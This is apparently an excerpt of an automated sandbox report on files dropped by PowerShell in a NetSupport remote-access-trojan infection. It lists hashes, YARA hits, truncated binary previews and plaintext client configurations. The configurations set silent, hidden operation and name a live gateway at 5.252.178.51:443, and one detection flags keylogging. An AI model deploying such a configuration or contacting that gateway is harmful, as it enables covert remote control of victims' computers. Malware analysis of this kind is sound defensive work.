                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                    Malicious:false
                                                                                                                    Preview:1
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2844081
                                                                                                                    Entropy (8bit):7.99808858664176
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:49152:OcqtE+5PWZMB1qEzda5D/GatWTjvE/OOKncjznXAU1gT2iYtl6W7:OVtEgPdiERqpWvMOODP31gDKIW7
                                                                                                                    MD5:0AB994C1381CA1054677D7FF3E142FD3
                                                                                                                    SHA1:6D230F2D77BD809B872D1EB55B3FF2BD26E7B5E4
                                                                                                                    SHA-256:69C42646023D753E4FE1709F37C8CD45B518B5AF1E58F4B8389C96AF1739471E
                                                                                                                    SHA-512:D05E138B20E20575848600502A18954259F3FF56D22F04AEE29E7B255AEE82610A838BE74ACFD7F36FF5DADE99345812447282BA27A070686E8356166224EC06
                                                                                                                    Malicious:false
                                                                                                                    Preview:PK.........z.P...I...x.......HTCTL32.DLL.:mp.U..3=I'.....+eb..!.F.y..$..I...I...1.(j..c.i.}D....M...kQ..X.-....k.1".L6.(.X%.,A].cx..a.1....I&.n.........}.9......a...t.a:..`......E..2....]....M.<V.....v.C...~..G..w.[.V~........+~.5..L......x.w.E..$..........y=.h..=....{..vN.S.e{..-c....}..&....d.e..9.Q.'....6.a...O.}_.aa..1=q.H....9.2..E)...p.K..w.5..8.?......."'.y...."..9...p.Lf...3'...L._...?./..j(..r.8....d.....C.....+k:..(1.w....o...sc."%k.[{.....xh...(Y{....7.>`.B..qx.0....O=9...=D...-.....s..;..yI.h.V.6..6].qi..,..+=\.E...k......M..O.62..c'}...s_l.....y...""|.` ..vVxz.0%...m...........q...9...+.wb.....y..#.....k.[#.2b..........Br,:.S.S..9. -q!.}..%-....{.vV....".q&F..r.t[.(....Y.u..N...e.9.$.....c.W.A.2...3.rV]s..S....;.Q..S>.Z..q...\.<..#....+.....I.|.[.a`...e1 e..:..nj..:..g...K.....!.b6..B....~._.....-t.<...M.....1.8.-.l........g.~...+'9..S..............xJ.....T..^..8.4......).8..=.-.~*.U]l;_..\.Mj.I..uy.{..u.GlH12......P5...
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):835
                                                                                                                    Entropy (8bit):5.35296432313925
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:TI2hzEPI8tlBapUz3lnx78G1fXXfDzsPuO:TI2tuIG13lnx78G1fHfCF
                                                                                                                    MD5:D8C9EE486351CCDF1338B2EA0029F4D6
                                                                                                                    SHA1:A7CA4ABA0E24E9D032E6BB23FAD17569320A183C
                                                                                                                    SHA-256:F1EE437D1162AD6B74FA8B0919753B12A4E50E02DAF080BABAB9ABD739E5849C
                                                                                                                    SHA-512:9B9D026BFE22A6D6DE285A61E8AED7F8C00A9FFD111107FCC3BCFE05E1880EAC8948147E8E86FC09D74F554A982035FC24C38E445C21B443C9FF0ABA236C95A4
                                                                                                                    Malicious:false
                                                                                                                    Preview:0xa965f102....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableManageServices=0..DisablePrintCapture=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Inactivity=0..Logging=1..Protocols=3..RoomSpec=Eval..SecurityKey2=dgAAAGou20IwsGgcCQNKUY4I7twA..silent=1..SKMode=1..SysTray=0..TicklePeriod=17..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=0..HookDirectSound=0..Threshold=78....[Bridge]..Modem=....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=61..GatewayAddress=5.252.178.51:443..GSK=FJ9N>ABKGG:I>HBHGN;D=M@HCLHM..Port=443....[View]..AutoScroll=7..LimitColorbits=0..ScrollDelay=1............
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):754
                                                                                                                    Entropy (8bit):5.389755543311711
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:BaAxS2hz7YU+Sj8zlBGSGpbjsz3lnxfTUtZ7+DP981E7GXXfDWss1CYur+uhrHD:9I2hzEPI8zlBapUz3lnx7fG1fXXfDvsu
                                                                                                                    MD5:0C4FF243929EE3D8605BA77E572E1925
                                                                                                                    SHA1:63225A636DF7C1E07312617294243A7FC534647C
                                                                                                                    SHA-256:F25CBF1D159153193B26BEAC27351AB47F6646B730E67486D5861A14867E6635
                                                                                                                    SHA-512:35DA233873F8B7D63407DFC3FD4F9FE0449437CA5BACB3EDCFCA8652B4900DD6E6B6A9BC019CB716145049605310431C8509B906168A567A88A047A746EFCFE5
                                                                                                                    Malicious:false
                                                                                                                    Preview:0x574343d2....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableManageServices=0..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Inactivity=0..Logging=1..Protocols=3..RoomSpec=Eval..SecurityKey2=dgAAAGou20IwsGgcCQNKUY4I7twA..silent=1..SKMode=1..SysTray=0..TicklePeriod=10..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[Bridge]..Modem=....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=61..GatewayAddress=5.252.178.51:443..GSK=FJ9N>ABKGG:I>HBHGN;D=M@HCLHM..Port=443....[View]..AutoScroll=6..LimitColorbits=6..
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):328056
                                                                                                                    Entropy (8bit):6.754723001562745
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                                                    MD5:2D3B207C8A48148296156E5725426C7F
                                                                                                                    SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                                                    SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                                                    SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\MediaContent\HTCTL32.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Joe Sandbox View:
                                                                                                                    • Filename: setup.hta, Detection: malicious, Browse
                                                                                                                    • Filename: Install_Updater_(win-silent).hta, Detection: malicious, Browse
                                                                                                                    • Filename: Install_Updater_(fast-silent).hta, Detection: malicious, Browse
                                                                                                                    • Filename: package_details_____________________14631459.js, Detection: malicious, Browse
                                                                                                                    • Filename: lolcaljefosijfoesnofiegoiesgnos.hta, Detection: malicious, Browse
                                                                                                                    • Filename: package_details_____________________972968.js, Detection: malicious, Browse
                                                                                                                    • Filename: package_details_____________________185181.js, Detection: malicious, Browse
                                                                                                                    • Filename: 553155315531.js, Detection: malicious, Browse
                                                                                                                    • Filename: 151215121512.js, Detection: malicious, Browse
                                                                                                                    • Filename: 465046504650.js, Detection: malicious, Browse
                                                                                                                    • Filename: 771771771.js, Detection: malicious, Browse
                                                                                                                    • Filename: 553155315531.js, Detection: malicious, Browse
                                                                                                                    • Filename: 259325932593.js, Detection: malicious, Browse
                                                                                                                    • Filename: 151215121512.js, Detection: malicious, Browse
                                                                                                                    • Filename: 465046504650.js, Detection: malicious, Browse
                                                                                                                    • Filename: 437943794379.js, Detection: malicious, Browse
                                                                                                                    • Filename: 768176817681.js, Detection: malicious, Browse
                                                                                                                    • Filename: 586058605860.js, Detection: malicious, Browse
                                                                                                                    • Filename: 332933293329.js, Detection: malicious, Browse
                                                                                                                    • Filename: 352535253525.js, Detection: malicious, Browse
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):257
                                                                                                                    Entropy (8bit):5.119720931145611
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:O/oPn4xRPjwx1lDKHMoEEjLgpW2MezvLdNWYpPM/ioVLa8l6i7s:XeR7wx6JjjqW2MePBPM/ioU8l6J
                                                                                                                    MD5:7067AF414215EE4C50BFCD3EA43C84F0
                                                                                                                    SHA1:C331D410672477844A4CA87F43A14E643C863AF9
                                                                                                                    SHA-256:2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
                                                                                                                    SHA-512:17B888087192BCEA9F56128D0950423B1807E294D1C4F953D1BF0F5BD08E5F8E35AFEEE584EBF9233BFC44E0723DB3661911415798159AC118C8A42AAF0B902F
                                                                                                                    Malicious:true
                                                                                                                    Preview:1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18808
                                                                                                                    Entropy (8bit):6.22028391196942
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                                                    MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                                                    SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                                                    SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                                                    SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\MediaContent\PCICHEK.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):3735416
                                                                                                                    Entropy (8bit):6.525042992590476
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:49152:cTXNZ+0ci2aYNT8wstdAukudJ1xTvIZamclSp+73mPu:cTXNo0cpKwstTJIkS43mm
                                                                                                                    MD5:00587238D16012152C2E951A087F2CC9
                                                                                                                    SHA1:C4E27A43075CE993FF6BB033360AF386B2FC58FF
                                                                                                                    SHA-256:63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
                                                                                                                    SHA-512:637950A1F78D3F3D02C30A49A16E91CF3DFCCC59104041876789BD7FDF9224D187209547766B91404C67319E13D1606DA7CEC397315495962CBF3E2CCD5F1226
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\MediaContent\PCICL32.DLL, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\MediaContent\PCICL32.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.t.I.'.I.'.I.'A..'.I.'...'.I.'.?#'.I.'...'.I.'.1.'.I.'.I.'.J.'.1.'.I.'.1.'.I.'..#',I.'.."'.I.'...'.I.'...'.I.'...'.I.'Rich.I.'................PE..L......V...........!......... ..............0................................9.....f-9.....................................4........`................8.x)...P7.p....@.......................P.......P..@............0..........`....................text............................... ..`.rdata.......0......................@..@.data....%..........................@....tls.........@......................@....hhshare.....P......................@....rsrc........`......................@..@.reloc..(2...P7..4....6.............@..B........................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):396664
                                                                                                                    Entropy (8bit):6.809064783360712
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
                                                                                                                    MD5:EAB603D12705752E3D268D86DFF74ED4
                                                                                                                    SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
                                                                                                                    SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
                                                                                                                    SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\MediaContent\TCCTL32.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:PE32 executable (DLL) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):28488
                                                                                                                    Entropy (8bit):6.768196736309723
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:GRZwHov3OymjX+KHrX6Tc94zPLZ2VI4aVmkhr3EDSGr3MW0LWTaIFDBRJ6PB5G7v:GRvOXrLqT5T0ghr0DBOA1P6XG7Yl9zz8
                                                                                                                    MD5:D8253B9F48D6A3EF8BB14F071EAF6899
                                                                                                                    SHA1:A42D8E70ED49A4F1E2D8A29D4E3EAC2C599D488A
                                                                                                                    SHA-256:27878853189E5A1A551AF93D63E986D40640F27BD87A3F5EB6375DE14BE4DC95
                                                                                                                    SHA-512:A89EBAD1F07064CE6601F6CF64910DBB05E7C85BFAF070B5FD47F8FA4214A37C0E7E994FEF1228765596B937C7EC476F385A5391BDDA03D4BC7D389BEBA87C6F
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........-...~...~...~.......~.......~.......~...~...~.......~.......~..'~...~.......~Rich...~........................PE..L.....`............!.....8...................P......................................*................................F..a...p`..(....p...............J..H%......H.......T............................................`..p............................text...q6.......8.................. ..`.data........P.......<..............@....idata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..H............H..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:PE32 executable (DLL) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):101184
                                                                                                                    Entropy (8bit):6.172224319787665
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:X9r6ZtYJHzy2JQRcq1frYXhQrd6dPIIEZILo:XZm2npq1frUQh6VINv
                                                                                                                    MD5:1573A2DE94A1EE0CE082EEF814869B9A
                                                                                                                    SHA1:9278B258A4556CB69FA5A985043067B7C6FF41CA
                                                                                                                    SHA-256:026854D6C62B786994F7A3384B73A22611D9A8B247034EC4F26DD9A3BE216213
                                                                                                                    SHA-512:8118A9A653D0569CFA8FF48EFBBEB10A3926DC3A6AA4DA6A93BFCF9BE87BEC6D638479FBCA84848E2F820527EED9A2F5615E639FE080FC57A32C72E3F5008181
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H.E.)...)...)...B...)...)...)...B...)...B...)...B^..)...B...)..Rich.)..........................PE..L...'.T............!.....P...................`......................................v...............................0^..P....p..(....................f..@%...........G..T............................................p...............................text....N.......P.................. ..`.data........`......................@....idata.......p.......T..............@..@.rsrc................Z..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):105848
                                                                                                                    Entropy (8bit):4.68250265552195
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:qTjV5+6j6Qa86Fkv2Wr120hZIqeTSGRp2TkFimMP:qHVZl6FhWr80/heT8TkFiH
                                                                                                                    MD5:8D9709FF7D9C83BD376E01912C734F0A
                                                                                                                    SHA1:E3C92713CE1D7EAA5E2B1FABEB06CDC0BB499294
                                                                                                                    SHA-256:49A568F8AC11173E3A0D76CFF6BC1D4B9BDF2C35C6D8570177422F142DCFDBE3
                                                                                                                    SHA-512:042AD89ED2E15671F5DF67766D11E1FA7ADA8241D4513E7C8F0D77B983505D63EBFB39FEFA590A2712B77D7024C04445390A8BF4999648F83DBAB6B0F04EB2EE
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...T..U.....................n...... ........ ....@..................................K....@.................................< ..<....0...i...........t..x).......... ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....i...0...j..................@..@.reloc..l............r..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:PE32 executable Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1002816
                                                                                                                    Entropy (8bit):6.68852280965848
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24576:Qc43U09bsBTM5dEEIvhqJhqQIJEx5jzXEOLo1cZSaI4oc+i:QNFsBQ5sZYIpax1hBIRC
                                                                                                                    MD5:E2E6F2D4D244A51464FED3200AB31647
                                                                                                                    SHA1:CA7A7BBC1EC4A29973D54F435D1CB8C712B7F249
                                                                                                                    SHA-256:C3406CFFC9F2C0A1B8A54C13B0B19940CA39677A4899C9C5D12FA9E8D6BC59A4
                                                                                                                    SHA-512:A0574A086B6F3276D43DCFE5A1B176888D582600CEE5B3E37F0C052B157AD81ACC86FA7DE54C96DC20C1946583F920CBE45C78D0A946E9B0F711DBA3C65B7CAE
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........w.g.$.g.$.g.$...%.g.$...%.g.$...%.g.$...%.g.$...%.f.$...%.g.$...%.g.$..Q$.g.$...%.g.$Rich.g.$................PE..L...4^............................................@..................................W...............................6..4............................(..@%...`..P`......p............................................................................text....w.......x.................. ..`PAGER32C......... ...|.............. ..`PAGE.....].......^.................. ..`.rdata...&.......(..................@..@.data........@......."..............@....rsrc................8..............@..@.reloc..P`...`...b..................@..B........................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):773968
                                                                                                                    Entropy (8bit):6.901559811406837
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                                    MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                                    SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                                    SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                                    SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:Windows setup INFormation
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):328
                                                                                                                    Entropy (8bit):4.93007757242403
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                                    MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                                    SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                                    SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                                    SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                                    Malicious:false
                                                                                                                    Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):33144
                                                                                                                    Entropy (8bit):6.737780491933496
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                                                    MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                                                    SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                                                    SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                                                    SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\MediaContent\pcicapi.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):54704
                                                                                                                    Entropy (8bit):5.017244943973426
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:vehWO78043LHCTPQuw/T3cgCsMl2PLLW/bC:vAb43LuPQFTSl2PLaTC
                                                                                                                    MD5:FE8978AEAC17836D0B99C3EDB88DE357
                                                                                                                    SHA1:D7320274619BAEB175855406D1027D02F845FB6C
                                                                                                                    SHA-256:577927563589C3C9D05C510BCE5F3CD9A55EA1DE155E50E87C066BBFF290A6FE
                                                                                                                    SHA-512:68B6C647B40F071A602DCECD580232ACA8434C7338837DEBDA9D1EC37776415F680AC184FFB1497C93CAA7353276D41D5DF77538E004C1FFD168217DF2CB5262
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\MediaContent\remcmdstub.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... OM.d.#.d.#.d.#..1(.e.#..2-.u.#..1).Q.#..&~.a.#.d.".X.#.b.(.e.#.b.).e.#..(%.e.#.Richd.#.........................PE..L...CY.K.................`...p...............p....@.................................o....................................... u..<.......X............................................................................p...............................text....V.......`.................. ..`.rdata.......p.......p..............@..@.data....E.......0..................@....rsrc...X...........................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):105848
                                                                                                                    Entropy (8bit):4.68250265552195
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:qTjV5+6j6Qa86Fkv2Wr120hZIqeTSGRp2TkFimMP:qHVZl6FhWr80/heT8TkFiH
                                                                                                                    MD5:8D9709FF7D9C83BD376E01912C734F0A
                                                                                                                    SHA1:E3C92713CE1D7EAA5E2B1FABEB06CDC0BB499294
                                                                                                                    SHA-256:49A568F8AC11173E3A0D76CFF6BC1D4B9BDF2C35C6D8570177422F142DCFDBE3
